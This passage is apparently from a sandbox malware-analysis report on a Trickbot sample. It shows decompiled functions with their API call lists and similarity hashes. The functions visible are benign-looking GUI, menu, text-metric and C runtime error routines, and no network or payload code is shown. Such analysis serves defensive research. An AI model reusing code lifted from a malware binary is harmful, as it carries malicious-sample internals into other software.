                          				OffsetRect( &_v68, 0, 4);
                          				 *0x4496c4 = _v68.top;
                          				 *0x4496c8 = _v68.right;
                          				_t193 = _v152.top;
                          				 *0x4496c0 = _v68.left;
                          				_t221 = _v68.bottom;
                          				 *0x4496cc = _t221;
                          				asm("cdq");
                          				_t155 = (_v152.bottom - _v152.top - _t221 >> 1) + _t193;
                          				_t195 = _t155 - _t166;
                          				_t167 = _t166 + _t155;
                          				_v136 = _t195;
                          				_v36.top = _t195;
                          				_v36.left =  *(_t228 + 0xc);
                          				_v36.right = _v152.right;
                          				_v36.bottom = _t167;
                          				OffsetRect( &_v36, 0xfffffffc, 0);
                          				 *0x4496b4 = _v36.top;
                          				 *0x4496b0 = _v36.left;
                          				_v20.left = _v152.left;
                          				 *0x4496b8 = _v36.right;
                          				 *0x4496bc = _v36.bottom;
                          				_v20.top = _v136;
                          				_v20.right =  *_t229;
                          				_v20.bottom = _t167;
                          				OffsetRect( &_v20, 4, 0);
                          				_t162 = _v20.top;
                          				 *0x4496d0 = _v20.left;
                          				 *0x4496d4 = _t162;
                          				 *0x4496d8 = _v20.right;
                          				 *0x4496dc = _v20.bottom;
                          				return _t162;
                          			}


                          0x00403d7a
                          0x00403d7e
                          0x00403d8b
                          0x00403d8e
                          0x00403d90
                          0x00403d94
                          0x00403d9b
                          0x00403da2
                          0x00403db4
                          0x00403db8
                          0x00403dcf
                          0x00403dd3
                          0x00403de3
                          0x00403dea
                          0x00403df1
                          0x00403dff
                          0x00403e0c
                          0x00403e15
                          0x00403e1b
                          0x00403e28
                          0x00403e2c
                          0x00403e3c
                          0x00403e40
                          0x00403e44
                          0x00403e52
                          0x00403e5c
                          0x00403e62

                          APIs
                          • GetSystemMetrics.USER32(00000005), ref: 00403D7E
                          • InflateRect.USER32(?), ref: 00403DB8
                          • OffsetRect.USER32(?,00000004,000000FC), ref: 00403DF1
                          • OffsetRect.USER32(?,000000FC,000000FC), ref: 00403E44
                          • OffsetRect.USER32(?,000000FC,00000004), ref: 00403E94
                          • OffsetRect.USER32(?,00000004,00000004), ref: 00403EE4
                          • OffsetRect.USER32(?,00000000,000000FC), ref: 00403F5E
                          • OffsetRect.USER32(?,00000000,00000004), ref: 00403FB2
                          • OffsetRect.USER32(?,000000FC,00000000), ref: 00404025
                          • OffsetRect.USER32(?,00000004,00000000), ref: 0040408C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Offset$InflateMetricsSystem
                          • String ID:
                          • API String ID: 2878613481-0
                          • Opcode ID: 7fc4fd259142b5792a3f9717946d8a1acf5cbb86edd7298868a2b4bd696d8ac4
                          • Instruction ID: 4bf22297b9a8a012ab263455615a11098a29f09f43bb9424803d7087da0d7f7f
                          • Opcode Fuzzy Hash: 7fc4fd259142b5792a3f9717946d8a1acf5cbb86edd7298868a2b4bd696d8ac4
                          • Instruction Fuzzy Hash: 53B193B86097408FD358CF29D980A5BFBE1BBC9310F118A2EF99983360D770A805CF56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E0043682F(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
                          				intOrPtr _v8;
                          				int _v12;
                          				int _v16;
                          				int _v20;
                          				signed int _v24;
                          				CHAR* _v28;
                          				int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				struct tagSIZE _v48;
                          				struct tagPOINT _v56;
                          				struct tagSIZE _v64;
                          				struct tagTEXTMETRICA _v120;
                          				struct tagTEXTMETRICA _v176;
                          				signed int _t119;
                          				signed int _t120;
                          				int _t121;
                          				signed int* _t125;
                          				long* _t127;
                          				signed int _t131;
                          				signed char _t132;
                          				int _t140;
                          				signed char* _t142;
                          				int _t144;
                          				int _t149;
                          				int _t153;
                          				signed int _t156;
                          				signed short _t159;
                          				signed char* _t167;
                          				int* _t170;
                          				signed int _t174;
                          				int _t175;
                          				int _t185;
                          				signed int _t187;
                          				int _t189;
                          				int _t190;
                          				void* _t191;
                          				int* _t193;
                          
                          				_t191 = __ecx;
                          				GetTextMetricsA( *(__ecx + 8),  &_v120);
                          				GetTextMetricsA( *(__ecx + 4),  &_v176);
                          				GetTextExtentPoint32A( *(__ecx + 8), 0x43d910, 1,  &_v48);
                          				_t119 = GetTextAlign( *(__ecx + 8));
                          				_v40 = _t119;
                          				_t120 = _t119 & 0x00000001;
                          				_v36 = _t120;
                          				if(_t120 == 0) {
                          					_t170 = _a8;
                          				} else {
                          					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
                          					_t170 = _a8;
                          					 *_t170 = _v56.x;
                          				}
                          				_t121 =  *_t170;
                          				_t193 = _a40;
                          				_t167 = _a12;
                          				_t185 = 0;
                          				_v28 = _t167;
                          				_v32 = _t121;
                          				_a12 = _t121;
                          				_v12 = 0;
                          				_v20 = 0;
                          				if(_a20 != 0) {
                          					if(_a24 != 1) {
                          						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x43d90c, 1, 0, 0);
                          						_t170 = _a8;
                          						_t185 = 0;
                          						_v20 = _t159 & 0x0000ffff;
                          					} else {
                          						_v20 =  *_a28;
                          					}
                          				}
                          				_v8 = _t185;
                          				if( *_a16 <= _t185) {
                          					L31:
                          					_t187 = _v40 & 0x00000006;
                          					_v48.cx = _a12 -  *_t170;
                          					_t125 = _a44;
                          					 *_t125 =  *_t125 & 0x00000000;
                          					if(_t187 != 0) {
                          						if(_t187 != 6) {
                          							if(_t187 == 2) {
                          								 *_t125 = _v12;
                          							}
                          							L38:
                          							if(_v36 != 0) {
                          								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
                          							}
                          							 *_a16 = _t193 - _a40 >> 2;
                          							_t127 = _a4;
                          							 *_t127 = _v48.cx;
                          							_t127[1] = _v48.cy;
                          							return _t127;
                          						}
                          						asm("cdq");
                          						_t131 = _v12 - _t187 >> 1;
                          						L33:
                          						 *_t170 =  *_t170 + _t131;
                          						goto L38;
                          					}
                          					_t131 = _v12;
                          					goto L33;
                          				} else {
                          					while(1) {
                          						_t132 =  *_t167;
                          						_t174 = 0 | _t132 == _v120.tmBreakChar;
                          						_v24 = _t174;
                          						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
                          							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
                          							_t140 = _v64.cx - _v120.tmOverhang + _v32;
                          							if(_v24 == 0) {
                          								_t140 = E004367FB(_t140, _a24, _a28, _a32, _v20);
                          							}
                          							_t175 = _t140;
                          							if(_t193 != _a40) {
                          								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
                          							} else {
                          								_v12 = _v12 + _t175 - _a12;
                          							}
                          							_a12 = _t140;
                          							_v32 = _t140;
                          							_v28 =  &(_t167[1]);
                          						} else {
                          							_t144 = _t132 & 0x000000ff;
                          							if(( *(_t144 + 0x44d1e1) & 0x00000004) == 0) {
                          								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
                          								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
                          									 *_t193 = _v120.tmAveCharWidth;
                          								}
                          								_t189 = _v16;
                          							} else {
                          								_t189 = _v176.tmAveCharWidth;
                          								 *_t193 = _v120.tmAveCharWidth;
                          							}
                          							_t190 = _t189 - _v176.tmOverhang;
                          							 *_t193 =  *_t193 - _v120.tmOverhang;
                          							_t149 =  *_t193;
                          							_a12 = _a12 + _t149;
                          							_v16 = _t190;
                          							if(_t193 != _a40) {
                          								asm("cdq");
                          								_t156 = _t149 - _t190 - _t190 >> 1;
                          								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
                          								 *_t193 = _t149 - _t156;
                          							}
                          							_a36 = _a36 + 1;
                          							 *_a36 =  *_t167;
                          							if(( *(( *_t167 & 0x000000ff) + 0x44d1e1) & 0x00000004) != 0) {
                          								_a36 = _a36 + 1;
                          								 *_a36 = _t167[1];
                          								_t153 =  *_t193;
                          								_a12 = _a12 + _t153;
                          								_t193 =  &(_t193[1]);
                          								_v8 = _v8 + 1;
                          								 *_t193 = _t153;
                          							}
                          							_t193 =  &(_t193[1]);
                          						}
                          						_t142 = E00405BB8(_t167);
                          						_v8 = _v8 + 1;
                          						_t167 = _t142;
                          						if(_v8 >=  *_a16) {
                          							break;
                          						}
                          						_t185 = 0;
                          					}
                          					_t170 = _a8;
                          					goto L31;
                          				}
                          			}


                          APIs
                          • GetTextMetricsA.GDI32(?,?), ref: 00436849
                          • GetTextMetricsA.GDI32(?,?), ref: 00436855
                          • GetTextExtentPoint32A.GDI32(?,0043D910,00000001,?), ref: 00436865
                          • GetTextAlign.GDI32(?), ref: 0043686E
                          • GetCurrentPositionEx.GDI32(?,?), ref: 00436886
                          • GetTabbedTextExtentA.USER32(?,0043D90C,00000001,00000000,00000000), ref: 004368D4
                          • GetCharWidthA.GDI32(?,?,?,?), ref: 0043693B
                          • GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 0043694A
                          • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004369CA
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00436A78
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
                          • String ID:
                          • API String ID: 2070200100-0
                          • Opcode ID: d512ed39c521d4131260e3782b7d57e5bf9cbda0613eb7769c8353c995261181
                          • Instruction ID: 7a9c9ed6fd5e2c439b2c001a5e531eb82d642c4d2e7523edbeaf7e703dc4bc8d
                          • Opcode Fuzzy Hash: d512ed39c521d4131260e3782b7d57e5bf9cbda0613eb7769c8353c995261181
                          • Instruction Fuzzy Hash: EC9133B190020AEFDF04CFA8C984AAEBBF5FF0D304F15916AE859A7210D735AA51CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0042E0A5(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				int _v16;
                          				signed int _v32;
                          				intOrPtr _v36;
                          				signed int _v40;
                          				int _v44;
                          				char _v48;
                          				void* __ebp;
                          				int _t53;
                          				int _t58;
                          				int _t61;
                          				signed int _t65;
                          				int _t66;
                          				void* _t67;
                          				int _t69;
                          				intOrPtr _t73;
                          				int _t74;
                          				int _t75;
                          				intOrPtr* _t77;
                          				struct HMENU__* _t83;
                          				intOrPtr _t84;
                          
                          				_t73 = __ecx;
                          				_v8 = __ecx;
                          				_t53 = E00422719( *((intOrPtr*)(__ecx + 0x1c)));
                          				if(_a12 == 0) {
                          					_t77 =  *((intOrPtr*)(__ecx + 0x68));
                          					_t84 = _a4;
                          					if(_t77 == 0) {
                          						L3:
                          						E0041BBAB( &_v48);
                          						_v36 = _t84;
                          						if( *((intOrPtr*)(E00432335() + 0x54)) !=  *(_t84 + 4)) {
                          							if(GetMenu( *(_t73 + 0x1c)) != 0) {
                          								_t67 = E00419DFD(_t73);
                          								if(_t67 != 0) {
                          									_t83 = GetMenu( *(_t67 + 0x1c));
                          									if(_t83 != 0) {
                          										_t69 = GetMenuItemCount(_t83);
                          										_t75 = 0;
                          										_a12 = _t69;
                          										if(_t69 > 0) {
                          											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
                          												_t75 = _t75 + 1;
                          												if(_t75 < _a12) {
                          													continue;
                          												} else {
                          												}
                          												goto L13;
                          											}
                          											_push(_t83);
                          											_v12 = E0041CF83();
                          										}
                          										L13:
                          										_t73 = _v8;
                          									}
                          								}
                          							}
                          						} else {
                          							_v12 = _t84;
                          						}
                          						_t53 = GetMenuItemCount( *(_t84 + 4));
                          						_v40 = _v40 & 0x00000000;
                          						_v16 = _t53;
                          						if(_t53 > 0) {
                          							do {
                          								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
                          								_v44 = _t58;
                          								if(_t58 != 0) {
                          									if(_t58 != 0xffffffff) {
                          										_v32 = _v32 & 0x00000000;
                          										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
                          											_push(1);
                          											_pop(0);
                          										}
                          										_push(0);
                          										goto L27;
                          									} else {
                          										_push(GetSubMenu( *(_t84 + 4), _v40));
                          										_t65 = E0041CF83();
                          										_v32 = _t65;
                          										if(_t65 != 0) {
                          											_t66 = GetMenuItemID( *(_t65 + 4), 0);
                          											_v44 = _t66;
                          											if(_t66 != 0 && _t66 != 0xffffffff) {
                          												_push(0);
                          												L27:
                          												_push(_t73);
                          												E0041BD70( &_v48);
                          												_t61 = GetMenuItemCount( *(_t84 + 4));
                          												_t74 = _t61;
                          												if(_t74 < _v16) {
                          													_v40 = _v40 + _t61 - _v16;
                          													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
                          														_v40 = _v40 + 1;
                          													}
                          												}
                          												_v16 = _t74;
                          												_t73 = _v8;
                          											}
                          										}
                          									}
                          								}
                          								_v40 = _v40 + 1;
                          								_t53 = _v40;
                          							} while (_t53 < _v16);
                          						}
                          					} else {
                          						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
                          						if(_t53 == 0) {
                          							goto L3;
                          						}
                          					}
                          				}
                          				return _t53;
                          			}


                          APIs
                            • Part of subcall function 00422719: GetFocus.USER32 ref: 0042271C
                            • Part of subcall function 00422719: GetParent.USER32(00000000), ref: 00422743
                            • Part of subcall function 00422719: GetWindowLongA.USER32(?,000000F0), ref: 0042275E
                            • Part of subcall function 00422719: GetParent.USER32(?), ref: 0042276C
                            • Part of subcall function 00422719: GetDesktopWindow.USER32 ref: 00422770
                            • Part of subcall function 00422719: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00422784
                          • GetMenu.USER32(?), ref: 0042E108
                          • GetMenu.USER32(?), ref: 0042E11C
                          • GetMenuItemCount.USER32(00000000), ref: 0042E125
                          • GetSubMenu.USER32(00000000,00000000), ref: 0042E136
                          • GetMenuItemCount.USER32(?), ref: 0042E158
                          • GetMenuItemID.USER32(?,00000000), ref: 0042E179
                          • GetSubMenu.USER32(?,00000000), ref: 0042E191
                          • GetMenuItemID.USER32(?,00000000), ref: 0042E1A9
                          • GetMenuItemCount.USER32(?), ref: 0042E1E0
                          • GetMenuItemID.USER32(?,00000000), ref: 0042E1FE
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                          • String ID:
                          • API String ID: 4186786570-0
                          • Opcode ID: b21dad6bb477f6bc8d02b42cb8de0f2a7252d18070ae69ed7fc0c9e5332331bb
                          • Instruction ID: ce1fb775b7e7e249fcd3a84db7769a6cd138d98829a453f8b38dfdd20dca4d90
                          • Opcode Fuzzy Hash: b21dad6bb477f6bc8d02b42cb8de0f2a7252d18070ae69ed7fc0c9e5332331bb
                          • Instruction Fuzzy Hash: 3C51A031A00214EFCF119FA6ED84BAEB7B9BF08300F60447AE512E6261D779DD51CB28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0042D085() {
                          				void* __ecx;
                          				void* __ebp;
                          				struct HWND__* _t21;
                          				int _t33;
                          				void* _t40;
                          				void* _t41;
                          				struct HWND__* _t46;
                          				struct HWND__* _t47;
                          				signed int _t48;
                          				signed int _t49;
                          				void* _t50;
                          
                          				_t40 = _t41;
                          				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
                          				_t21 = _t40 + 0xa0;
                          				if( *(_t40 + 0xa0) > 1) {
                          					L18:
                          					return _t21;
                          				}
                          				 *((intOrPtr*)(_t50 + 0x14)) = E00419DFD(_t41);
                          				_t48 = 0;
                          				_t21 = GetWindow(GetDesktopWindow(), 5);
                          				_t46 = _t21;
                          				if(_t46 == 0) {
                          					goto L18;
                          				} else {
                          					goto L2;
                          				}
                          				do {
                          					L2:
                          					if(IsWindowEnabled(_t46) != 0) {
                          						_push(_t46);
                          						if(E00418874() != 0 && E0042D065( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
                          							_t48 = _t48 + 1;
                          						}
                          					}
                          					_t21 = GetWindow(_t46, 2);
                          					_t46 = _t21;
                          				} while (_t46 != 0);
                          				if(_t48 != 0) {
                          					 *(_t40 + 0xa4) = E0041BDEB(4 + _t48 * 4);
                          					_push(5);
                          					_t49 = 0;
                          					_push(GetDesktopWindow());
                          					while(1) {
                          						_t47 = GetWindow();
                          						if(_t47 == 0) {
                          							break;
                          						}
                          						if(IsWindowEnabled(_t47) != 0) {
                          							_push(_t47);
                          							if(E00418874() != 0 && E0042D065( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
                          								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
                          								if(_t33 == 0) {
                          									EnableWindow(_t47, _t33);
                          									( *(_t40 + 0xa4))[_t49] = _t47;
                          									_t49 = _t49 + 1;
                          								}
                          							}
                          						}
                          						_push(2);
                          						_push(_t47);
                          					}
                          					_t21 =  *(_t40 + 0xa4);
                          					_t21[_t49] = _t21[_t49] & 0x00000000;
                          				}
                          			}


                          APIs
                          • GetDesktopWindow.USER32 ref: 0042D0B2
                          • GetWindow.USER32(00000000), ref: 0042D0BF
                          • IsWindowEnabled.USER32(00000000), ref: 0042D0CC
                          • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0042D0FB
                          • GetWindow.USER32(00000000,00000002), ref: 0042D109
                          • GetDesktopWindow.USER32 ref: 0042D131
                          • GetWindow.USER32(00000000), ref: 0042D138
                          • IsWindowEnabled.USER32(00000000), ref: 0042D141
                          • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0042D170
                          • EnableWindow.USER32(00000000,00000000), ref: 0042D17C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$DesktopEnabledMessageSend$Enable
                          • String ID:
                          • API String ID: 2339141687-0
                          • Opcode ID: 575be53366ca8c21fffe31b4c2ae39e49ccc076262894bd6eb44ad6d8bb032c4
                          • Instruction ID: 684f3636350392492d75512719374e00d371a8ec544ee05bc3ea3ac8dcbe3cb4
                          • Opcode Fuzzy Hash: 575be53366ca8c21fffe31b4c2ae39e49ccc076262894bd6eb44ad6d8bb032c4
                          • Instruction Fuzzy Hash: 7231D431B023347FE721AF25AC45FBB3658AF02745F45003AFE41DA292DBA8CC0186AD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004292DF(void* __ecx, int _a4) {
                          				int _v8;
                          				struct tagRECT _v24;
                          				int _t39;
                          				int _t42;
                          				int _t61;
                          				int _t64;
                          				void* _t66;
                          				long _t67;
                          				int _t69;
                          
                          				_t67 = _a4;
                          				_t66 = __ecx;
                          				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
                          				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
                          					GetWindowRect( *(_t66 + 0x1c),  &_v24);
                          					_t42 = _a4;
                          					_t69 = _v24.right - _v24.left;
                          					_t64 =  *(_t42 + 0x10);
                          					_t61 = _v24.bottom - _v24.top;
                          					_t39 =  *(_t42 + 0x14);
                          					_v8 = _t64;
                          					_a4 = _t39;
                          					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
                          						SetRect( &_v24, _t64 -  *0x44b308, 0, _t64, _t39);
                          						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                          						SetRect( &_v24, _t69 -  *0x44b308, 0, _t69, _a4);
                          						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                          						_t64 = _v8;
                          						_t39 = _a4;
                          					}
                          					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
                          						SetRect( &_v24, 0, _t39 -  *0x44b30c, _t64, _t39);
                          						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                          						SetRect( &_v24, 0, _t61 -  *0x44b30c, _v8, _t61);
                          						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                          					}
                          				}
                          				return _t39;
                          			}


                          APIs
                          • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 004292F5
                          • GetWindowRect.USER32(?,?), ref: 0042930C
                          • SetRect.USER32(?,?,00000000,?,?), ref: 00429346
                          • InvalidateRect.USER32(?,?,00000001), ref: 00429355
                          • SetRect.USER32(?,?,00000000,?,?), ref: 0042936C
                          • InvalidateRect.USER32(?,?,00000001), ref: 0042937B
                          • SetRect.USER32(?,00000000,?,?,?), ref: 004293A6
                          • InvalidateRect.USER32(?,?,00000001), ref: 004293B1
                          • SetRect.USER32(?,00000000,?,?,?), ref: 004293C8
                          • InvalidateRect.USER32(?,?,00000001), ref: 004293D3
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Invalidate$Window$Proc
                          • String ID:
                          • API String ID: 570070710-0
                          • Opcode ID: ef83807571e1cbdd609db15501e6faa9c319f24feb746e6c60099b857223ed54
                          • Instruction ID: 605fb7ce47509bacdf85f3dc97e800f3151216dabef9d9aeeaa767b85a7e3567
                          • Opcode Fuzzy Hash: ef83807571e1cbdd609db15501e6faa9c319f24feb746e6c60099b857223ed54
                          • Instruction Fuzzy Hash: F431D976900219BBDF10CFA4DD89FAE7BBDFB08704F144125FA01A61A0D7B0AE55CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog.LIBCMT ref: 0040ED13
                            • Part of subcall function 0040F8E9: EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalEnterH_prologSection
                          • String ID: LC$LC$LC$TC$`C$`C$`C
                          • API String ID: 206681789-1816145022
                          • Opcode ID: 2d26d9fa8773bd3e4b544101bf150cfde2853762f4052e6733cb9cdab8f0461b
                          • Instruction ID: 031b02d6b9362480f5f86662834bd5df58bf562096781ab6874aec523a84ca38
                          • Opcode Fuzzy Hash: 2d26d9fa8773bd3e4b544101bf150cfde2853762f4052e6733cb9cdab8f0461b
                          • Instruction Fuzzy Hash: 6C413BB0B502159BEB109F5ACD81BAEB6E5EF54704F04487FB501BB3D1CBB9C9048B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog.LIBCMT ref: 0040ED13
                            • Part of subcall function 0040F8E9: EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalEnterH_prologSection
                          • String ID: LC$LC$LC$TC$`C$`C$`C
                          • API String ID: 206681789-1816145022
                          • Opcode ID: 020ab9eb6b92901a34814251179857d2deb7fbf8fece653922950245d948cf38
                          • Instruction ID: 93396243a3b78d42a05f0aec3d3cb5528afc00f5486e0746794ded7baf09afbb
                          • Opcode Fuzzy Hash: 020ab9eb6b92901a34814251179857d2deb7fbf8fece653922950245d948cf38
                          • Instruction Fuzzy Hash: 57414DB0B102199BEB149F5ACD81BAEB6E5EF54704F14487FB501BB3D1CBB8C9048B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E004094D7(void* __edi, long _a4) {
                          				char _v164;
                          				char _v424;
                          				int _t17;
                          				long _t19;
                          				signed int _t42;
                          				long _t47;
                          				void* _t48;
                          				signed int _t54;
                          				void** _t56;
                          				void* _t57;
                          
                          				_t48 = __edi;
                          				_t47 = _a4;
                          				_t42 = 0;
                          				_t17 = 0x4483a8;
                          				while(_t47 !=  *_t17) {
                          					_t17 = _t17 + 8;
                          					_t42 = _t42 + 1;
                          					if(_t17 < 0x448438) {
                          						continue;
                          					}
                          					break;
                          				}
                          				_t54 = _t42 << 3;
                          				_t2 = _t54 + 0x4483a8; // 0x4c000000
                          				if(_t47 ==  *_t2) {
                          					_t17 =  *0x44b74c; // 0x0
                          					if(_t17 == 1 || _t17 == 0 &&  *0x447ec4 == 1) {
                          						_t16 = _t54 + 0x4483ac; // 0x43e94c
                          						_t56 = _t16;
                          						_t19 = E00409BE0( *_t56);
                          						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                          					} else {
                          						if(_t47 != 0xfc) {
                          							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                          								E0040A840( &_v424, "<program name unknown>");
                          							}
                          							_push(_t48);
                          							_t49 =  &_v424;
                          							if(E00409BE0( &_v424) + 1 > 0x3c) {
                          								_t49 = E00409BE0( &_v424) +  &_v424 - 0x3b;
                          								E0040B920(E00409BE0( &_v424) +  &_v424 - 0x3b, "...", 3);
                          								_t57 = _t57 + 0x10;
                          							}
                          							E0040A840( &_v164, "Runtime Error!\n\nProgram: ");
                          							E0040A850( &_v164, _t49);
                          							E0040A850( &_v164, "\n\n");
                          							_t12 = _t54 + 0x4483ac; // 0x43e94c
                          							E0040A850( &_v164,  *_t12);
                          							_t17 = E0040B897( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                          						}
                          					}
                          				}
                          				return _t17;
                          			}


                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,j/@), ref: 00409544
                          • GetStdHandle.KERNEL32(000000F4,0043E94C,00000000,00402F6A,00000000,j/@), ref: 0040961A
                          • WriteFile.KERNEL32(00000000), ref: 00409621
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
